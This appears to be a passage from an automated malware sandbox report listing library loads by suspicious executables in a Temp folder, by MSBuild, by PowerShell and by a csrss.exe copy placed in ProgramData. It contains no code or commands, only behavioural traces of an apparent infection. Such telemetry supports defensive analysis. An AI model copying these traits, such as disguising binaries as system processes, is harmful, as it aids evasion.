Source: C:\Users\user\AppData\Local\Temp\81F7.exe	Section loaded: esent.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\81F7.exe	Section loaded: winscard.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\81F7.exe	Section loaded: lz32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\81F7.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\81F7.exe	Section loaded: opengl32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\81F7.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\81F7.exe	Section loaded: devobj.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\81F7.exe	Section loaded: glu32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\81F7.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\81F7.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\81F7.exe	Section loaded: csunsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\81F7.exe	Section loaded: swift.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\81F7.exe	Section loaded: nfhwcrhk.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\81F7.exe	Section loaded: surewarehook.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\81F7.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\81F7.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\81F7.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\81F7.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\81F7.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\81F7.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\81F7.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\81F7.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\81F7.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\81F7.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\81F7.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\81F7.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\81F7.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\81F7.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\81F7.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\81F7.exe	Section loaded: csunsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\81F7.exe	Section loaded: aep.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\81F7.exe	Section loaded: atasi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\81F7.exe	Section loaded: swift.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\81F7.exe	Section loaded: nfhwcrhk.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\81F7.exe	Section loaded: nuronssl.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\81F7.exe	Section loaded: surewarehook.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\81F7.exe	Section loaded: ubsec.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\81F7.exe	Section loaded: aep.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\81F7.exe	Section loaded: atasi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\81F7.exe	Section loaded: swift.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\81F7.exe	Section loaded: nfhwcrhk.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\81F7.exe	Section loaded: nuronssl.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\81F7.exe	Section loaded: surewarehook.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\81F7.exe	Section loaded: ubsec.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\81F7.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\81F7.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\81F7.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\81F7.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\81F7.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\81F7.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8BAD.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Temp\8BAD.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\8BAD.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\8BAD.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\8BAD.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\8BAD.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\8BAD.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\8BAD.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\8BAD.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\8BAD.exe	Section loaded: amsi.dll
Source: C:\Users\user\AppData\Local\Temp\8BAD.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\8BAD.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\8BAD.exe	Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\Temp\8BAD.exe	Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Local\Temp\8BAD.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\8BAD.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\8BAD.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\8BAD.exe	Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\Temp\8BAD.exe	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\8BAD.exe	Section loaded: sxs.dll
Source: C:\Users\user\AppData\Local\Temp\98EC.exe	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\98EC.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\98EC.exe	Section loaded: webio.dll
Source: C:\Users\user\AppData\Local\Temp\98EC.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\98EC.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\98EC.exe	Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\98EC.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\98EC.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\98EC.exe	Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\98EC.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\98EC.exe	Section loaded: schannel.dll
Source: C:\Users\user\AppData\Local\Temp\98EC.exe	Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Local\Temp\98EC.exe	Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\98EC.exe	Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\98EC.exe	Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Local\Temp\98EC.exe	Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\Temp\98EC.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\98EC.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\98EC.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\98EC.exe	Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Local\Temp\98EC.exe	Section loaded: dpapi.dll
Source: C:\Users\user\AppData\Local\Temp\98EC.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\98EC.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\98EC.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\98EC.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\98EC.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\98EC.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\98EC.exe	Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Local\Temp\98EC.exe	Section loaded: amsi.dll
Source: C:\Users\user\AppData\Local\Temp\98EC.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\98EC.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\98EC.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\98EC.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\9E0E.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\9E0E.exe	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\9E0E.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\9E0E.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\9E0E.exe	Section loaded: comsvcs.dll
Source: C:\Users\user\AppData\Local\Temp\9E0E.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\9E0E.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\9E0E.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\9E0E.exe	Section loaded: cmlua.dll
Source: C:\Users\user\AppData\Local\Temp\9E0E.exe	Section loaded: cmutil.dll
Source: C:\Users\user\AppData\Local\Temp\9E0E.exe	Section loaded: version.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: winhttp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: webio.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: mswsock.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: winnsi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: sspicli.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: dnsapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: rasadhlp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: fwpuclnt.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: schannel.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: mskeyprotect.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: ntasn1.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: ncrypt.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: ncryptsslp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: msasn1.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: cryptsp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: rsaenh.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: cryptbase.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: gpapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: dpapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: amsi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: userenv.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: profapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: version.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\9E0E.exe	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\9E0E.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\9E0E.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\AF26.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Temp\AF26.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\AF26.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\AF26.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\AF26.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\AF26.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\AF26.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\AF26.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\AF26.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\AF26.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\AF26.exe	Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Temp\AF26.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\AF26.exe	Section loaded: edputil.dll
Source: C:\Users\user\AppData\Local\Temp\AF26.exe	Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\AF26.exe	Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\AF26.exe	Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\AF26.exe	Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\AF26.exe	Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Local\Temp\AF26.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\AF26.exe	Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\AF26.exe	Section loaded: appresolver.dll
Source: C:\Users\user\AppData\Local\Temp\AF26.exe	Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Local\Temp\AF26.exe	Section loaded: slc.dll
Source: C:\Users\user\AppData\Local\Temp\AF26.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\AF26.exe	Section loaded: sppc.dll
Source: C:\Users\user\AppData\Local\Temp\AF26.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\AF26.exe	Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe	Section loaded: msimg32.dll
Source: C:\Users\user\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe	Section loaded: msvcr100.dll
Source: C:\Users\user\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe	Section loaded: powrprof.dll
Source: C:\Users\user\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe	Section loaded: umpdc.dll
Source: C:\Users\user\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe	Section loaded: wtsapi32.dll
Source: C:\Users\user\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe	Section loaded: winsta.dll
Source: C:\Users\user\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe	Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe	Section loaded: sxs.dll
Source: C:\Users\user\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe	Section loaded: amsi.dll
Source: C:\Users\user\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe	Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe	Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe	Section loaded: netapi32.dll
Source: C:\Users\user\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe	Section loaded: samcli.dll
Source: C:\Users\user\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe	Section loaded: samlib.dll
Source: C:\Users\user\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe	Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe	Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe	Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe	Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Local\Temp\InstallSetup4.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\InstallSetup4.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\InstallSetup4.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\InstallSetup4.exe	Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Temp\InstallSetup4.exe	Section loaded: dwmapi.dll
Source: C:\Users\user\AppData\Local\Temp\InstallSetup4.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\InstallSetup4.exe	Section loaded: oleacc.dll
Source: C:\Users\user\AppData\Local\Temp\InstallSetup4.exe	Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\Temp\InstallSetup4.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\InstallSetup4.exe	Section loaded: shfolder.dll
Source: C:\Users\user\AppData\Local\Temp\InstallSetup4.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\InstallSetup4.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\InstallSetup4.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\InstallSetup4.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\InstallSetup4.exe	Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\InstallSetup4.exe	Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\InstallSetup4.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\InstallSetup4.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\InstallSetup4.exe	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\InstallSetup4.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\InstallSetup4.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\InstallSetup4.exe	Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\InstallSetup4.exe	Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\InstallSetup4.exe	Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\InstallSetup4.exe	Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\FourthX.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\BroomSetup.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\BroomSetup.exe	Section loaded: netapi32.dll
Source: C:\Users\user\AppData\Local\Temp\BroomSetup.exe	Section loaded: wtsapi32.dll
Source: C:\Users\user\AppData\Local\Temp\BroomSetup.exe	Section loaded: wkscli.dll
Source: C:\Users\user\AppData\Local\Temp\BroomSetup.exe	Section loaded: cscapi.dll
Source: C:\Users\user\AppData\Local\Temp\BroomSetup.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\BroomSetup.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\BroomSetup.exe	Section loaded: winsta.dll
Source: C:\Users\user\AppData\Local\Temp\BroomSetup.exe	Section loaded: colorui.dll
Source: C:\Users\user\AppData\Local\Temp\BroomSetup.exe	Section loaded: mscms.dll
Source: C:\Users\user\AppData\Local\Temp\BroomSetup.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\BroomSetup.exe	Section loaded: coloradapterclient.dll
Source: C:\Users\user\AppData\Local\Temp\BroomSetup.exe	Section loaded: compstui.dll
Source: C:\Users\user\AppData\Local\Temp\BroomSetup.exe	Section loaded: msimg32.dll
Source: C:\Users\user\AppData\Local\Temp\BroomSetup.exe	Section loaded: inetres.dll
Source: C:\Users\user\AppData\Local\Temp\BroomSetup.exe	Section loaded: msimg32.dll
Source: C:\Users\user\AppData\Local\Temp\BroomSetup.exe	Section loaded: windowscodecs.dll
Source: C:\Users\user\AppData\Local\Temp\BroomSetup.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\BroomSetup.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\BroomSetup.exe	Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Temp\BroomSetup.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\BroomSetup.exe	Section loaded: dwmapi.dll
Source: C:\Users\user\AppData\Local\Temp\BroomSetup.exe	Section loaded: textshaping.dll
Source: C:\Users\user\AppData\Local\Temp\BroomSetup.exe	Section loaded: textinputframework.dll
Source: C:\Users\user\AppData\Local\Temp\BroomSetup.exe	Section loaded: coreuicomponents.dll
Source: C:\Users\user\AppData\Local\Temp\BroomSetup.exe	Section loaded: coremessaging.dll
Source: C:\Users\user\AppData\Local\Temp\BroomSetup.exe	Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\Temp\BroomSetup.exe	Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\BroomSetup.exe	Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\BroomSetup.exe	Section loaded: wintypes.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: edputil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wintypes.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appresolver.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: bcp47langs.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: slc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sppc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mpr.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: pcacli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sfc_os.dll
Source: C:\ProgramData\Drivers\csrss.exe	Section loaded: apphelp.dll
Source: C:\ProgramData\Drivers\csrss.exe	Section loaded: msimg32.dll
Source: C:\ProgramData\Drivers\csrss.exe	Section loaded: uxtheme.dll
